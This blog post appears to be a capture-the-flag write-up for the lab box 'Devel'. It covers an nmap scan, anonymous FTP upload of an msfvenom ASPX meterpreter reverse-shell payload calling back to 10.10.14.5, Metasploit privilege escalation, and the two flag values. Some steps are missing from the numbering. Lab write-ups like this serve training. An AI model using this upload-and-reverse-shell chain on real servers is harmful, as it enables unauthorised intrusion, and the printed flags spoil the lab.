DEVEL 10.10.10.5 Write Up
Machine Created by ch4p
Tools Used for Enumeration:
1. nmapTools Used for Exploitation:
1. ftp2. metasploit
Steps for primary enumeration:
1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the Devel box we can see, open ports and services are, port 21 for ftp and port 80 for http server. Scan shows ftp server is vulnerable to anonymous ftp login.command used: nmap -A 10.10.10.5
Steps to get user.txt:
1. Scan shows ftp server is vulnerable to anonymous ftp login. The ftp login is showing http server files. Which means we can upload shell and execute it. As the server is IIS (microsoft aspnet), we are going to upload aspx shell.Command to create metasploit shell: msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > zishan.aspx
2. Login to ftp server as anonymous user using command: ftp 10.10.10.5 and put username anonymous and password blank. Now upload the shell by typing command: put zishan.aspx.
4. Background the meterpreter shell using background command. Now use post/multi/recon/local_exploit_suggester and select session with set SESSION 1 command to get local exploits to privilege escalation.
6. Type cat c:/Users/babis/Desktop/user.txt.txt command to get user flag.
Steps to get root.txt:
1. Type cat c:/Users/Administrator/Desktop/root.txt.txt command to get root flag.
Flags:
1. user.txt flag: 9ecdd6a3aedf24b41562fea70f4cb3e82. root.txt flag: e621a0b5041708797c4fc4728bc72b4b
No comments:
Post a Comment